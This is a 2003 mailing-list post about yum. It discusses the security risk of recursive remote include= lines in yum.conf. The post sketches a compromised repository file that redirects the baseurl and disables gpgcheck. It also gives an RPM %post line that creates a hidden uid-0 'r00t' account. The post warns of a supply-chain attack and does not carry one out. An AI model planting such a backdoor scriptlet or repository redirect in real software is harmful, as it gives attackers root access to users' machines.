[Yum] Security issues with include= implementation in yum.conf
seth vidal
skvidal at phy.duke.edu
Sat Oct 4 07:10:43 UTC 2003
> First, includes are recursive. e.g. yum.conf may include a file that
> includes a file that includes a file ad infinitum. And, it is possible
> to include either local files or remote (http/ftp) files. The problem
> here is that it is (currently) possible for a remote file to include any
> other file. When the remote file is managed by the user this isn't a big
> deal but if repositories started providing files for users to include=
> in their yum.conf's, this could lead to security concerns in that the
> remote file can basically set arbitrary values in yum.conf (adding other
> repositories behind the scenes, etc). Or, if a remote file is
> compromised, it could point to some other repository URL without the
> user knowing, which may allow a malicious someone to update almost
> anything (in the absence of gpg).
The first person who suggests gpg signing config files gets beaten. :)
My general take is that this no big deal - but there is the possibility
for much abuse and much flexibility. Hard call between the two of them.
from a standpoint of flexibility being able to get parts of your config
file from an arbitrary url is useful and handy - on the other hand that
think of this config file:
[main]
include=http://domain.org/mymain.cgi
include=http://freshrpms.net/default-repo
include=http://fedora.us/default.repo
include=http://joeblows/default.repo
now fedora and freshrpms are trustworthy folks - but joeblow might not
be or none of their security might be good enough and the default.repo
for joeblows might normally be:
[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://joeblows/rpms/
gpgcheck=1
it could become:
[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://someotherplacew/evil/rpms/
gpgcheck=0
the results could be - that someotherplace has taken all of joeblows
rpms and rebuilt them with:
%post
/usr/sbin/adduser -r -u 0 -p somepass r00t
Clearly anyone can see the implications of that.
include= could give a lot of flexibility in a controlled environment, or
it could allow more boxes to be rooted quickly :)
I just wanted to add a precise example to ryan's comment.
-sv
More information about the Yum
mailing list